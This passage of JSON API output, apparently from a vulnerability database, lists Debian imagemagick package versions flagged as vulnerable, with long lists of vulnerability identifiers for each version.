"VCID-1abc-45xr-5bhb" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-1daq-9kb7-eudz" }, { "vulnerability": "VCID-1e38-tmxy-9kew" }, { "vulnerability": "VCID-1ftp-6fvm-rfez" }, { "vulnerability": "VCID-1gh4-vs86-aufs" }, { "vulnerability": "VCID-1gqw-pheb-hfey" }, { "vulnerability": "VCID-1nrq-kzuy-vyfx" }, { "vulnerability": "VCID-1q1g-ses8-wqae" }, { "vulnerability": "VCID-1q97-afut-4ffy" }, { "vulnerability": "VCID-1x18-b9sa-yygh" }, { "vulnerability": "VCID-1x5f-2jf7-hbb2" }, { "vulnerability": "VCID-25zp-duta-2ffk" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2a2h-yk41-qybt" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2ea6-uaw4-wba9" }, { "vulnerability": "VCID-2fzg-6h13-s7bk" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2ken-ysm1-2ybw" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2pwb-71f5-8ken" }, { "vulnerability": "VCID-2r23-hhkx-9fh6" }, { "vulnerability": "VCID-2wxd-hmac-4fcv" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-38vp-3yf8-aue8" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3dsm-e7ye-wqe1" }, { "vulnerability": "VCID-3fa4-xqhq-2fdq" }, { "vulnerability": "VCID-3fzh-1hk1-3ub1" }, { "vulnerability": "VCID-3pky-3t1q-v3av" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3ubj-wp5c-ruat" }, { "vulnerability": "VCID-3vc6-9vhj-ckb2" }, { "vulnerability": "VCID-3yqe-cntb-t3fb" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-4633-67u6-akg8" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-46gw-xunr-jqbp" }, { "vulnerability": "VCID-477e-a2hz-aqb9" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4dxa-f7vm-7feh" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4kxf-5xrh-uue8" }, { "vulnerability": "VCID-4pzm-24uf-73b6" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-4urn-ywwt-ayeg" }, { "vulnerability": "VCID-5114-9n17-pkd1" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-57gx-fkgs-f7cb" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5fc9-tutn-dubw" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5u53-66es-vkbv" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5y72-4n85-qyeb" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-65b6-jbxy-gudt" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6d5n-tv5h-xkhj" }, { "vulnerability": "VCID-6gh6-3g99-x7hz" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6hay-bjuv-nygd" }, { "vulnerability": "VCID-6jnv-nnkm-v7a3" }, { "vulnerability": "VCID-6kep-3ygd-hkbn" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6wy3-xwez-vfej" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6yn4-p8f4-pbh1" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-73j4-24p8-pbe5" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-78zg-am5w-gugh" }, { "vulnerability": "VCID-79w4-fqmh-j3bk" }, { "vulnerability": "VCID-7dqc-1d5h-uybs" }, { "vulnerability": "VCID-7eeu-wtkq-dyc1" }, { "vulnerability": "VCID-7fw6-fzyj-7qf3" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7jvc-54zg-pbcz" }, { "vulnerability": "VCID-7jx8-htkz-7qd4" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7vrs-x5dn-sbcm" }, { "vulnerability": "VCID-7ynu-qf57-ykba" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-872v-6z75-jucm" }, { "vulnerability": "VCID-8862-dh13-hyga" }, { "vulnerability": "VCID-8an6-y8xy-pyf3" }, { "vulnerability": "VCID-8j37-fwz2-bfea" }, { "vulnerability": "VCID-8jgu-2tx3-gkcb" }, { "vulnerability": "VCID-8n3f-ass1-97gj" }, { "vulnerability": "VCID-8v7y-kcz2-bbb9" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-93a6-7956-v3ar" }, { "vulnerability": "VCID-93em-sxxc-j3ep" }, { "vulnerability": "VCID-99f6-k1y9-x7ba" }, { "vulnerability": "VCID-9akb-t56u-4yhr" }, { "vulnerability": "VCID-9ark-hra3-zyh9" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-9n1x-qw25-mbhf" }, { "vulnerability": "VCID-9pr7-aw96-cqfb" }, { "vulnerability": "VCID-9xbc-3nhd-cygp" }, { "vulnerability": "VCID-9z34-j85g-9kej" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-aycq-4vqg-ubgp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b7dh-gjtk-qfhn" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bf7n-dsx6-rqa2" }, { "vulnerability": "VCID-bge6-p7sc-dqdu" }, { "vulnerability": "VCID-bhkh-rppj-1bb5" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c11x-uq25-17b1" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-chgt-azpf-auba" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-crpp-9mt6-nbb6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-cuyh-2uau-1yad" }, { "vulnerability": "VCID-cwez-6cgj-17gz" }, { "vulnerability": "VCID-cz1h-x2a4-zkhj" }, { "vulnerability": "VCID-d74a-pd2n-6khw" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dge7-469z-u7gq" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dkf5-8kww-mkhn" }, { "vulnerability": "VCID-dkzb-3u3f-yuee" }, { "vulnerability": "VCID-dsee-yrq9-cuca" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-dvvt-ud6y-ffe8" }, { "vulnerability": "VCID-dzxx-5pbd-fqc4" }, { "vulnerability": "VCID-e3av-cqc9-dye1" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb86-ytt7-j3gf" }, { "vulnerability": "VCID-ee5d-s8eb-tbdn" }, { "vulnerability": "VCID-eeah-xwrp-f3b5" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-ekgu-5zg9-2uaa" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-envn-rnvj-4yd2" }, { "vulnerability": "VCID-ep6g-44qy-5qd7" }, { "vulnerability": "VCID-eqr7-q1ga-8kcr" }, { "vulnerability": "VCID-es5w-6nr6-73cn" }, { "vulnerability": "VCID-et5y-g25w-4qay" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-f9z9-h8bt-9bg7" }, { "vulnerability": "VCID-fbta-m4mx-jfap" }, { "vulnerability": "VCID-fd5j-v9vt-5fbu" }, { "vulnerability": "VCID-fds9-yfxw-gqgs" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzct-psgq-8fcb" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g2k2-5sn8-t7dz" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g6mw-mvbu-fbcs" }, { "vulnerability": "VCID-g6sp-5zkq-dkf9" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-gq8m-6nq9-4bcq" }, { "vulnerability": "VCID-gqgz-418x-skd3" }, { "vulnerability": "VCID-gqky-zdxn-e3gd" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h6ps-ukb8-qfa9" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hcjv-e7jt-nbbp" }, { "vulnerability": "VCID-hcxd-bker-sqc1" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hry9-mkha-nfct" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-hzr4-8x4m-87cy" }, { "vulnerability": "VCID-j1jt-g5m8-ffbh" }, { "vulnerability": "VCID-jbhc-41ed-guap" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jcmt-5fes-jug2" }, { "vulnerability": "VCID-je5t-8uuq-ekdk" }, { "vulnerability": "VCID-jjzy-ch18-qkfp" }, { "vulnerability": "VCID-jkdz-rbkr-pygc" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jume-bjh7-f3hr" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-jz9p-mte7-vfb3" }, { "vulnerability": "VCID-k1pr-h6c7-2fgp" }, { "vulnerability": "VCID-k1v6-jp8s-pye7" }, { "vulnerability": "VCID-k7ku-8uya-kbeu" }, { "vulnerability": "VCID-kd82-724m-77h8" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-kq6x-z56m-wqhh" }, { "vulnerability": "VCID-kxus-63yw-sufe" }, { "vulnerability": "VCID-m31q-v2ue-zyh1" }, { "vulnerability": "VCID-m9bk-66wv-vqbk" }, { "vulnerability": "VCID-mcry-3vgm-kyh1" }, { "vulnerability": "VCID-mg1t-vz1h-47b9" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mn7e-8e4j-dqba" }, { "vulnerability": "VCID-mt9h-kjh8-kbdu" }, { "vulnerability": "VCID-mvga-q2ts-mqdh" }, { "vulnerability": "VCID-mwf4-u6v6-zqdu" }, { "vulnerability": "VCID-mws6-wym5-d3f6" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-n59p-w7sh-sbhb" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-ngzz-mwp9-rkdv" }, { "vulnerability": "VCID-nnmr-dnnk-qkc4" }, { "vulnerability": "VCID-nsfn-bhe3-cbd4" }, { "vulnerability": "VCID-nsn7-a7z8-1qcd" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-ny9s-4kcr-tbf4" }, { "vulnerability": "VCID-nzh5-tng5-8qdq" }, { "vulnerability": "VCID-p3p3-suuz-dycr" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p5f8-45e4-ybex" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-paf4-ycea-buae" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-ph82-atva-6kgd" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-pnk5-26uq-w3cu" }, { "vulnerability": "VCID-ps6p-v38m-6qe3" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-pthp-wza7-hkgm" }, { "vulnerability": "VCID-punt-nwt4-uqea" }, { "vulnerability": "VCID-pwhs-ep5j-pqa7" }, { "vulnerability": "VCID-pydk-g827-guc5" }, { "vulnerability": "VCID-q2zg-jh8m-tua2" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qjrj-rdqd-uqdy" }, { "vulnerability": "VCID-qp4x-w3fe-hyer" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rf1t-45cj-mue1" }, { "vulnerability": "VCID-rhpj-r7ym-7kdn" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rwat-s4hf-v7bv" }, { "vulnerability": "VCID-rxgw-h3br-b7dy" }, { "vulnerability": "VCID-rypf-qy6p-3bac" }, { "vulnerability": "VCID-ryu7-2nsu-kqf6" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-rzvc-hba1-zfcy" }, { "vulnerability": "VCID-rzz2-km3v-b3hw" }, { "vulnerability": "VCID-s4cu-swuc-9fh4" }, { "vulnerability": "VCID-s4p8-s262-fqfx" }, { "vulnerability": "VCID-s543-mazj-fqfd" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sat2-d6u2-f3c9" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-sdwh-3s12-17fr" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-szhs-nysy-6bap" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-t4gn-rwz1-ykcf" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-thbh-m54e-z7ca" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tms4-1k6m-cqgd" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tnb2-7mvf-sqdk" }, { "vulnerability": "VCID-tnnn-bg52-93a9" }, { "vulnerability": "VCID-trt9-1y65-53en" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-tv6b-u42h-xkh2" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-tzpa-13fk-7kc9" }, { "vulnerability": "VCID-u23c-4px5-c3g9" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-u9um-rar7-97e8" }, { "vulnerability": "VCID-u9v8-n717-fyag" }, { "vulnerability": "VCID-uatu-64df-b7b8" }, { "vulnerability": "VCID-uayc-3r68-tudp" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-umnw-ksa8-9ua8" }, { "vulnerability": "VCID-upce-8s7m-2kfk" }, { "vulnerability": "VCID-ur14-3rbn-j3ev" }, { "vulnerability": "VCID-urv8-ve9y-e3b4" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v24g-h7t5-nbec" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-v7m7-26bu-wfer" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vbgc-23c4-77hu" }, { "vulnerability": "VCID-vd3a-e897-8bfn" }, { "vulnerability": "VCID-vdum-127b-qfbq" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vp4y-qhc4-nuat" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-vzru-smr4-5kfk" }, { "vulnerability": "VCID-w44j-ecnr-mkhv" }, { "vulnerability": "VCID-w5bd-tn21-fqh7" }, { "vulnerability": "VCID-w8d2-r2ct-m7gv" }, { "vulnerability": "VCID-wbx1-wdxc-k3bc" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-wwxb-6psb-xybx" }, { "vulnerability": "VCID-x3wb-64kk-gues" }, { "vulnerability": "VCID-x65n-6vuk-4ufk" }, { "vulnerability": "VCID-x6sg-6k7v-9qd8" }, { "vulnerability": "VCID-x7us-26aq-3yf8" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xaef-x656-fqfq" }, { "vulnerability": "VCID-xgu5-jypk-h3bd" }, { "vulnerability": "VCID-xgzr-fhu9-myed" }, { "vulnerability": "VCID-xk7c-7f1m-sqe5" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xp3x-q8w4-myhb" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-xtq9-fvcv-kfat" }, { "vulnerability": "VCID-xy5b-m3h2-hbfj" }, { "vulnerability": "VCID-y2nm-f9vb-d7ez" }, { "vulnerability": "VCID-y2pd-cxmz-6yfp" }, { "vulnerability": "VCID-y3xr-bv9y-mqb5" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-ydbk-11w9-wyen" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yqzg-rzp1-bbgm" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-yxwd-j8uj-tudx" }, { "vulnerability": "VCID-z7e5-pt2s-x3a5" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zfw4-5zqw-huh7" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zjgp-g783-d3hy" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zrkc-cfnt-r7hr" }, { "vulnerability": "VCID-zrtt-8nnj-v3ch" }, { "vulnerability": "VCID-zs46-dubn-wfga" }, { "vulnerability": "VCID-zszf-nytw-jqgx" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" }, { "vulnerability": "VCID-zyg9-ad7g-ayex" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.7.4%252Bdfsg-11%252Bdeb9u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, 